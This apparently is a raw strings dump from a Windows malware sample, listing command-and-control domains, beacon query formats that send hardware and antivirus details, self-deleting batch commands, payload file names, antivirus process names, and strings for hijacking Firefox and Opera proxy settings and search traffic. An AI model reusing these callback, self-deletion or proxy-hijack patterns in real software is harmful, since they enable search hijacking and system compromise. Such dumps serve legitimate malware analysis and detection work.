%s_%d_%d_%d_%d

%s_%s

%s_%s

http://xprstats.com/k1.php

http://xprstats.com/k1.php

type=%s&system=na&id=%s&status=%s

type=%s&system=na&id=%s&status=%s

t=st&q=%s

t=st&q=%s

%s?tq=%s

%s?tq=%s

TMFLDMN%d

TMFLDMN%d

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=118

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=118

%s_%s_%d

%s_%s_%d

_1_%d

_1_%d

_2_%d

_2_%d

_3_%d

_3_%d

_4_%d

_4_%d

grizlybigtit.com

grizlybigtit.com

cloudstorepro.com

cloudstorepro.com

remindmeroster.com

remindmeroster.com

yordatazone.com

yordatazone.com

sitystorefor.com

sitystorefor.com

datastorepro.com

datastorepro.com

onlinepdahelpforyou.com

onlinepdahelpforyou.com

remarkreddomas.com

remarkreddomas.com

transfersakkonline.com

transfersakkonline.com

backupdomaintolevel.com

backupdomaintolevel.com

SELECT_RESERV_SRV_%d

SELECT_RESERV_SRV_%d

http://%s.%s

http://%s.%s

%s.%s

%s.%s

stor.cfg

stor.cfg

exec%s

exec%s

%s_%d_%s

%s_%d_%s

id=%s&c=%d

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d_%d

%s_%d_%d

%s_%d_%d

%s %s

%s %s

%s start%s%c%s

%s start%s%c%s

c1.exe

c1.exe

c2.exe

c2.exe

c3.exe

c3.exe

DWN_CON_STRP_%d_%s

DWN_CON_STRP_%d_%s

http://

http://

http://%d.ctrl.%s

http://%d.ctrl.%s

logo.png

logo.png

img/135.png

img/135.png

img/136.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?sv=%d&tq=%s

%s/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

http://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

http://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

http://binghamtonschools.org/images/297893.jpg

http://binghamtonschools.org/images/297893.jpg

http://binghamtonschools.org/images/297894.jpg

http://binghamtonschools.org/images/297894.jpg

http://alleducationalsoftware.com/creditcardlogos.gif

http://alleducationalsoftware.com/creditcardlogos.gif

http://alleducationalsoftware.com/creditcard.png

http://alleducationalsoftware.com/creditcard.png

http://alleducationalsoftware.com/creditcard2.png

http://alleducationalsoftware.com/creditcard2.png

http://patentgenius.com/temp/head.png

http://patentgenius.com/temp/head.png

http://patentgenius.com/132.gif

http://patentgenius.com/132.gif

http://patentgenius.com/133.gif

http://patentgenius.com/133.gif

http://freedownload3.com/screenshot/4/s/89_3276.gif

http://freedownload3.com/screenshot/4/s/89_3276.gif

http://freedownload3.com/screenshot/4/s/89_3277.gif

http://freedownload3.com/screenshot/4/s/89_3277.gif

http://freedownload3.com/screenshot/4/s/89_3278.gif

http://freedownload3.com/screenshot/4/s/89_3278.gif

http://istockanalyst.com/png/intel.gif

http://istockanalyst.com/png/intel.gif

http://istockanalyst.com/png/intel.jpg

http://istockanalyst.com/png/intel.jpg

http://istockanalyst.com/12.jpg

http://istockanalyst.com/12.jpg

http://complaintsboard.com/complaints/logo.png

http://complaintsboard.com/complaints/logo.png

http://complaintsboard.com/complaints/zip.png

http://complaintsboard.com/complaints/zip.png

http://complaintsboard.com/complaints/rar.png

http://complaintsboard.com/complaints/rar.png

http://highspeedinternetlosangeles.webnode.com/news/1.cgi

http://highspeedinternetlosangeles.webnode.com/news/1.cgi

http://highspeedinternetlosangeles.webnode.com/news/1.php

http://highspeedinternetlosangeles.webnode.com/news/1.php

http://highspeedinternetlosangeles.webnode.com/news/2.php

http://highspeedinternetlosangeles.webnode.com/news/2.php

http://newworldorderreport.com/favicon.ico

http://newworldorderreport.com/favicon.ico

http://newworldorderreport.com/img/3421.png

http://newworldorderreport.com/img/3421.png

http://newworldorderreport.com/img/3422.png

http://newworldorderreport.com/img/3422.png

http://jointhenewworldorder.com/images/pages.jpg

http://jointhenewworldorder.com/images/pages.jpg

http://jointhenewworldorder.com/images/pages.png

http://jointhenewworldorder.com/images/pages.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

http://cdn.adventofdeception.com/logo.png

http://cdn.adventofdeception.com/logo.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

t=ip&hrs=%d&q=&s=1

%s?sv=%d&tq=%s

%s?sv=%d&tq=%s

\bl%d_64.bat

\bl%d_64.bat

del "%s"

del "%s"

if exist "%s" goto a

if exist "%s" goto a

cmd.exe /c "%s"

cmd.exe /c "%s"

GET %s HTTP/1.1

GET %s HTTP/1.1

Host: %s

Host: %s

User-Agent: chrome/9.0

User-Agent: chrome/9.0

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

ahst.lni

ahst.lni

milktoyoustudios.com

milktoyoustudios.com

http://%s/s.php?c=121&id=%s

http://%s/s.php?c=121&id=%s

bigbulkhypnocrys.com

bigbulkhypnocrys.com

http://xprstats.com/images/logo.png

http://xprstats.com/images/logo.png

drweb

drweb

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

t=ml&q=%s

t=ml&q=%s

xprstats.com

xprstats.com

http://%s%s

http://%s%s

%s_1_%d_%s

%s_1_%d_%s

%s_2_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_3_%d_%s

%s_4_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

pmv=2&id=%s&hwid=%s

u.exe

u.exe

%s up%s

%s up%s

&%s=%s

&%s=%s

avgnt.exe

avgnt.exe

AVGIDSAgent.exe

AVGIDSAgent.exe

avgwdsvc.exe

avgwdsvc.exe

ccsvchst.exe

ccsvchst.exe

AvastUI.exe

AvastUI.exe

mcagent.exe

mcagent.exe

PRM_LSTN_THIS_PORT

PRM_LSTN_THIS_PORT

Opera

Opera

127.0.0.1

127.0.0.1

HTTP/1.x

HTTP/1.x

google.com

google.com

http://www.google.com

http://www.google.com

HTTP/1.1 302 Found

HTTP/1.1 302 Found

Location: %s

Location: %s

id=%s&type=%d&ppcid=%s

id=%s&type=%d&ppcid=%s

%s: %s

%s: %s

%s_5_%s

%s_5_%s

http=127.0.0.1:

http=127.0.0.1:

prefs.js

prefs.js

Mozilla

Mozilla

"network.proxy.http"

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.http_port"

"network.proxy.type"

"network.proxy.type"

"127.0.0.1"

"127.0.0.1"

%s(%s, %s);

%s(%s, %s);

operaprefs.ini

operaprefs.ini

Use HTTP

Use HTTP

HTTP server

HTTP server

127.0.0.1:%s

127.0.0.1:%s

%s=%s

%s=%s

%s:%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

id=%s&hwid=%s

exec|%s

exec|%s

http=

http=

HTTP/1.0 200 OK

HTTP/1.0 200 OK

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

bing.com

bing.com

yahoo.com

yahoo.com

search.aol.

search.aol.

suche.aol.

suche.aol.

searcht2.aol.

searcht2.aol.

.yimg.com

.yimg.com

.bing.net

.bing.net

scorecardresearch.com

scorecardresearch.com

brightcove.com

brightcove.com

.aol.

.aol.

.atwola.

.atwola.

.ivwbox.

.ivwbox.

.google

.google

.atdmt.

.atdmt.

.abmr.

.abmr.

.tacoda.

.tacoda.

.adtechus.

.adtechus.

.autodatadirect.

.autodatadirect.

.mapquestapi.

.mapquestapi.

.ggpht.

.ggpht.

.virtualearth.

.virtualearth.

.opera.

.opera.

.microsoft.

.microsoft.

.wsod.

.wsod.

.doubleclick.

.doubleclick.

.ypcdn.

.ypcdn.

.truveo.

.truveo.

.tlowdb.

.tlowdb.

mapq.st

mapq.st

.dartsearch.

.dartsearch.

.thawte.

.thawte.

http://

http://

bing.com/search

bing.com/search

bing.com:80/search

bing.com:80/search

search.yahoo.com/search

search.yahoo.com/search

%s_1_%s

%s_1_%s

err%d%s_%d_%d

err%d%s_%d_%d

err0%s_%d_%d

err0%s_%d_%d

ver=118&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

ver=118&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

%s:443/%s

%s:443/%s

%s_2_%s

%s_2_%s

%s_%s_%s

%s_%s_%s

%s_3_%s

%s_3_%s

www.www.ru

www.www.ru

https://

https://

.doubleclick.net

.doubleclick.net

doubleclick.net

doubleclick.net

msn.com

msn.com

%s_0%d_%d

%s_0%d_%d

=='undefined'?'%s':'%s'

=='undefined'?'%s':'%s'

.referrer

.referrer

HTTP/1.0

HTTP/1.0

%s %s %s

%s %s %s

http://www.google.com/

http://www.google.com/

http://www.yahoo.com/

http://www.yahoo.com/

.class

.class

.midi

.midi

google_ad.url

google_ad.url

google_ad.title

google_ad.title

r.msn.com

r.msn.com

google_ad.line1

google_ad.line1

zcÁ

zcÁ

c:\%original file name%.exe

c:\%original file name%.exe

%Program Files%\CF2C6

%Program Files%\CF2C6

%Documents and Settings%\%current user%\Application Data\507CF

%Documents and Settings%\%current user%\Application Data\507CF

%Program Files%\LP\4645

%Program Files%\LP\4645

GetCPInfo

GetCPInfo

RegFlushKey

RegFlushKey

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

WinHttpReadData

WinHttpReadData

WinHttpOpenRequest

WinHttpOpenRequest

WinHttpOpen

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpQueryDataAvailable

WinHttpReceiveResponse

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpSendRequest

WinHttpConnect

WinHttpConnect

WinHttpCloseHandle

WinHttpCloseHandle

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

KERNEL32.DLL

KERNEL32.DLL

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

RASAPI32.dll

RASAPI32.dll

RPCRT4.dll

RPCRT4.dll

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

USER32.dll

USER32.dll

WINHTTP.dll

WINHTTP.dll

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

mscoree.dll

mscoree.dll

nKERNEL32.DLL

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

WUSER32.DLL

WUSER32.DLL

Dr.Web

Dr.Web

mhttp=127.0.0.1:%d

mhttp=127.0.0.1:%d

http://www.yahoo.com

http://www.yahoo.com

2.0.2.1

2.0.2.1